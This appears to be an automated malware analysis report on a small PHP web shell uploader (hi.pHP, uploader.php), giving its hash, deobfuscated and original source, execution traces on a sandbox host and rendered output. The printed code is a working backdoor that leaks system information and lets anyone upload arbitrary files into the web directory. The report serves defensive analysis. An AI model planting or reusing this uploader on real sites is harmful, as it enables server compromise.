PHP Malware Analysis

hi.pHP, uploader.php, uploader.txt

md5: a6b7043572c4646c84bce7aea7709221

Deobfuscated PHP code

<?php

echo '<pre>' . php_uname() . "\n" . '<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';
if ($_POST) {
    if (@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])) {
        echo "OK";
    } else {
        echo "ER";
    }
}

Execution traces

data/traces/a6b7043572c4646c84bce7aea7709221_trace-1676239895.1336.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:12:01.031411]
1	0	1	0.000149	393528
1	3	0	0.000204	395624	{main}	1		/var/www/html/uploads/uploader.php	0	0
2	4	0	0.000220	395624	php_uname	0		/var/www/html/uploads/uploader.php	1	0
2	4	1	0.000234	395736
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000257	395624
			0.000283	314240
TRACE END   [2023-02-12 20:12:01.031577]

data/traces/a6b7043572c4646c84bce7aea7709221_trace-1676258950.5505.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:29:36.448330]
1	0	1	0.000168	393464
1	3	0	0.000225	395552	{main}	1		/var/www/html/uploads/hi.pHP	0	0
2	4	0	0.000241	395552	php_uname	0		/var/www/html/uploads/hi.pHP	1	0
2	4	1	0.000255	395664
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000278	395552
			0.000303	314200
TRACE END   [2023-02-13 01:29:36.448499]


Generated HTML code

<html><head></head><body><pre>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
<br><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form></pre></body></html>

Original PHP code

<?php echo '<pre>'.php_uname()."\n".'<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'OK';}else{echo 'ER';}}?>